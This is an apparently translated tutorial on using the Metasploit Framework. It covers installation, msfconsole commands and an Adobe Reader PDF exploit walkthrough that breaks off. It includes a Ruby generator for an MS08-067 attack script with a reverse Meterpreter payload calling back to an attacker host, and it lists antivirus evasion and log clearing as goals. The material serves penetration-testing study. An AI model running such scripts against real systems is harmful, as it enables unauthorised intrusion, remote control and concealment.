Metasploit Framework is fully available on the Windows platform. To install it, download the latest installer from metasploit.com and run the executable,
then click "Next" through the installer until the "Finish" button appears.
Once the installation is complete, the standard msfconsole interface is available from the Start menu.
To update on Windows, launch the Metasploit console and choose File menu -> New Tab -> Development -> Update Metasploit (the msfupdate command does the same thing from the console).
What can we do with Metasploit?
The Framework lets you do many things, such as:
- Scan a machine and collect all available information about it
- Identify and exploit vulnerabilities
- Escalate privileges and exfiltrate data
- Install a backdoor
- Evade antivirus
- Clear logs and cover tracks
The Framework is structured as follows:
The architecture diagram shows that the design is modular and that the Framework can be driven through several interfaces: a GUI (msfgui), a web interface (msfweb), a command-line tool (msfcli) and the console (msfconsole).
In the rest of the article we will use the console interface, which is the most suitable one for taking full advantage of MSF (Metasploit Framework).
The main advantage of the Framework is precisely this modularity: it makes it possible to combine any exploit with any compatible payload, which simplifies the work of attackers, exploit developers and payload developers alike.
Exploits: these are Ruby modules that trigger a vulnerability on a remote machine. The exploit is what gets us onto the vulnerable machine; it carries the payload and makes the target execute it.
Payloads: this is the code that runs on the target once the exploit has succeeded; it is what gives us control of the victim machine, for example by binding a shell to a port on the machine, connecting back to us, or opening a VNC session.
Auxiliary modules: these are modules used for supporting tasks such as port scanning, sniffing and service scanning.
Once the exploit and payload have run on a vulnerable machine, the attacker can do whatever they want with the system: download the target's data, install malware, take screenshots, and so on.
How to use Metasploit?
We now move on to the most interesting part: actually using Metasploit.
Here are the basic steps for compromising a system with Metasploit:
- Collect information about the target, such as the operating system version and the network services it runs. This information can be gathered with footprinting and port-scanning tools such as Nmap, Maltego and Nessus;
- Choose and configure an exploit;
- Check whether the target system is vulnerable to the chosen exploit (many exploit modules support the check command for this);
- Choose and configure a payload;
- Run the exploit.
For now, we'll start with some basic msfconsole commands (they are case-sensitive):
- Show all available exploits in Metasploit: show exploits
- Search for an exploit by name or keyword: search exploit_name
- Select an exploit: use exploit_name
- Get information about an exploit: info exploit_name
- See the options of an exploit: show options
- Show all available payloads in Metasploit: show payloads
- Choose the payload to use: set PAYLOAD payload_name
- See the payload options once a payload is set: show options
- Get help: help
- Find out the version of Metasploit: version
- List all modules (exploits, auxiliary modules, payloads, etc.): show all
- Exit Metasploit: quit
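The procedure above (pick a module, set its options, pick a payload, check, run) is usually automated as an msfconsole resource script (.rc) that is replayed with msfconsole -r. The following Ruby snippet is an added example, not code from the original article or from the Metasploit project: it builds such a script from a module path, its options and a payload, and rejects malformed module paths before msfconsole has to. The module, payload, host and port names in the sample are assumptions chosen for illustration; take the real option names from the module's own "show options" output.

```ruby
# Added example (not part of the original article): generate an msfconsole
# resource script that replays the basic steps listed above.
# Module, payload and option names below are assumptions for illustration.

# Rough shape of a module path (type/platform/.../name). It catches typos
# such as "exploits/..." before the script is handed to msfconsole.
MODULE_PATH = %r{\A(exploit|auxiliary|post)/[\w.\-]+(/[\w.\-]+)+\z}

# Build the text of a resource script. Returns a String; nothing is run here.
# options         -> module options, e.g. {"RHOSTS" => "192.0.2.10"}
# payload         -> payload path, e.g. "windows/meterpreter/reverse_tcp"
# payload_options -> options the payload needs, e.g. LHOST / LPORT
# check           -> emit "check" before running (only exploits support it)
def build_rc(mod, options, payload: nil, payload_options: {}, check: true)
  raise ArgumentError, "invalid module path: #{mod}" unless mod.match?(MODULE_PATH)

  lines = ["use #{mod}"]
  options.each { |k, v| lines << "set #{k} #{v}" }
  if payload
    lines << "set PAYLOAD #{payload}"
    payload_options.each { |k, v| lines << "set #{k} #{v}" }
  end
  lines << "show options"                        # review every option before running
  lines << "check" if check && mod.start_with?("exploit/")
  lines << (mod.start_with?("exploit/") ? "exploit" : "run")
  lines.join("\n") + "\n"
end

# Sample: a remote exploit with a reverse Meterpreter payload.
# Target and listener addresses are documentation-range values (assumed).
def sample_rc
  build_rc("exploit/windows/smb/ms08_067_netapi",
           { "RHOSTS" => "192.0.2.10" },
           payload: "windows/meterpreter/reverse_tcp",
           payload_options: { "LHOST" => "192.0.2.1", "LPORT" => 4444 })
end

if __FILE__ == $PROGRAM_NAME
  puts sample_rc
end
```

Redirect the output to a file (ruby build_rc.rb > exploit.rc) and run it with msfconsole -q -r exploit.rc. Keeping "check" before "exploit" in the generated script is deliberate: it turns step 3 of the procedure into something the script cannot skip, and the output of "show options" is left in the console log so the run can be audited afterwards.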
Metasploit usage example
Now we are going to practise by exploiting a flaw in a piece of Adobe software.
The vulnerability affects Adobe Reader 9.0.0 (on Windows XP SP3) and Adobe Reader 8.1.2 (on Windows XP SP2). Opening a specially crafted PDF file with these versions triggers a buffer overflow, which lets an attacker run code on the victim's machine and take control of it. This is a client-side (file-format) attack: the victim has to open the malicious PDF.
To reproduce this test, first install version 9.0.0 of Adobe Reader on the target. The Metasploit module that exploits this flaw is called "adobe_jbig2decode" (full path exploit/windows/fileformat/adobe_jbig2decode).